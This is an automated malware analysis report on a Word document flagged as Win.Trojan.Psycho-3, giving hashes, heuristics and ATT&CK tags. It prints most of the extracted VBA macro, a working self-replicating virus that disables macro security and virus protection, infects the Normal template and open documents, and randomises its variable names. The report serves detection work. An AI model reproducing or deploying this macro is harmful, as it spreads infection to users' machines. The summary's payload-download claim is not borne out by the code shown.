Win.Trojan.Psycho-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 51e4aa0fec26bf4d…

MALICIOUS

Office (OLE)

Size: 39.0 KB
Created: 2000-07-04 22:55:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: ebcafd95d3c699daab4c373c370686f1
SHA-1: 3a50d2b18c2b40406d50f205163a5e11e8a2437e
SHA-256: 51e4aa0fec26bf4d59dc0a221e83053b36bd8011396f95ea409636a845db3db8
Risk Score: 120

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to lower macro security settings and appears to be designed to download and execute a secondary payload. The ClamAV detection explicitly identifies it as Win.Trojan.Psycho-3.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4641 bytes
SHA-256: 35fa7280c9b7ad62f70ea1ce5a645684b8735322a66bb304d50ac9c2581af464
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
mbopl1mbop = "M"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.VirusProtection = False
Options.SaveNormalPrompt = False
mbopfimbop = 1
Options.ConfirmConversions = False
Set mbopNtmbop = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
mbopsembop = 2
Set mbopAdmbop = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set mbopTdmbop = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
mboptrmbop = 5
mbopl2mbop = "b"
mbopfnmbop = mbopfimbop & mbopsembop & mboptrmbop
For mbopiimbop = 1 To mbopTdmbop.countoflines
If InStr(mbopTdmbop.lines(mbopiimbop, 1), "Private Sub Document_Open()") <> 0 Then
mbopSlmbop = mbopiimbop
Exit For
End If
Next
mbopl3mbop = "o"
mbopVcmbop = Trim(mbopTdmbop.lines(mbopSlmbop, mbopSlmbop + mbopfnmbop))
mboplvmbop = 97
If mbopNtmbop.countoflines > 0 Then
mbopNlmbop = mbopNtmbop.lines(1, mbopNtmbop.countoflines)
If InStr(mbopNlmbop, "Nt") = 0 And InStr(mbopNlmbop, "Sl") = 0 And InStr(mbopNlmbop, "Nl") = 0 And InStr(mbopNlmbop, "Ad") = 0 And InStr(mbopNlmbop, "Vc") = 0 And InStr(mbopNlmbop, "Td") = 0 Then
If InStr(LCase(mbopNlmbop), "private sub document_open()") <> 0 Then
For mbopimbop = 1 To mbopNtmbop.countoflines
If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
For mbopimbop = mbopnsmbop To mbopNtmbop.countoflines
If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then
mbopnembop = mbopimbop
Exit For
End If
Next
mbopNtmbop.deletelines mbopnsmbop, mbopnembop
End If
If InStr(LCase(mbopNlmbop), "option explicit") <> 0 Then
For mbopimbop = 1 To mbopNtmbop.countoflines
If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
mbopNtmbop.deletelines mbopnsmbop, 1
End If
mbopNtmbop.addfromstring mbopVcmbop
mbopinmbop = True
End If
Else
mbopNtmbop.addfromstring mbopVcmbop
mbopinmbop = True
End If
mbophvmbop = 122
If mbopAdmbop.countoflines > 0 Then
mbopAlmbop = mbopAdmbop.lines(1, mbopAdmbop.countoflines)
If InStr(mbopAlmbop, "Nt") = 0 And InStr(mbopAlmbop, "Sl") = 0 And InStr(mbopAlmbop, "Nl") = 0 And InStr(mbopAlmbop, "Ad") = 0 And InStr(mbopAlmbop, "Vc") = 0 And InStr(mbopAlmbop, "Td") = 0 Then
If InStr(LCase(mbopAlmbop), "private sub document_open()") <> 0 Then
For mbopimbop = 1 To mbopAdmbop.countoflines
If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
For mbopimbop = mbopnsmbop To mbopAdmbop.countoflines
If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then
mbopnembop = mbopimbop
Exit For
End If
Next
mbopAdmbop.deletelines mbopnsmbop, mbopnembop
End If
If InStr(LCase(mbopAlmbop), "option explicit") <> 0 Then
For mbopimbop = 1 To mbopAdmbop.countoflines
If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
mbopAdmbop.deletelines mbopnsmbop, 1
End If
mbopAdmbop.addfromstring mbopVcmbop
mbopiambop = True
End If
Else
mbopAdmbop.addfromstring mbopVcmbop
mbopiambop = True
End If
mbopl4mbop = "p"
mbop15mbop = 15
For mbopiimbop = 1 To mbop15mbop
Randomize
mbopTnmbop = mbopTnmbop & Chr(Int((mbophvmbop - mboplvmbop + 1) * Rnd + mboplvmbop))
Next
mbopd2mbop = 9
mbopVcmbop = mbopTdmbop.lines(1, mbopTdmbop.countoflines)
mbopTdmbop.deletelines 1, mbopTdmbop.countoflines
Do While InStr(mbopVcmbop, "mbop") <> 0
mbopVcmbop = Mid(mbopVcmbop, 1, InStr(mbopVcmbop, "mbop") - 1) & mbopTnmbop & Mid(mbopVcmbop, InStr(mbopVcmbop, "mbop") + Len("mbop"))
Loop
mbopTdmbop.addfromstring mbop
... (truncated)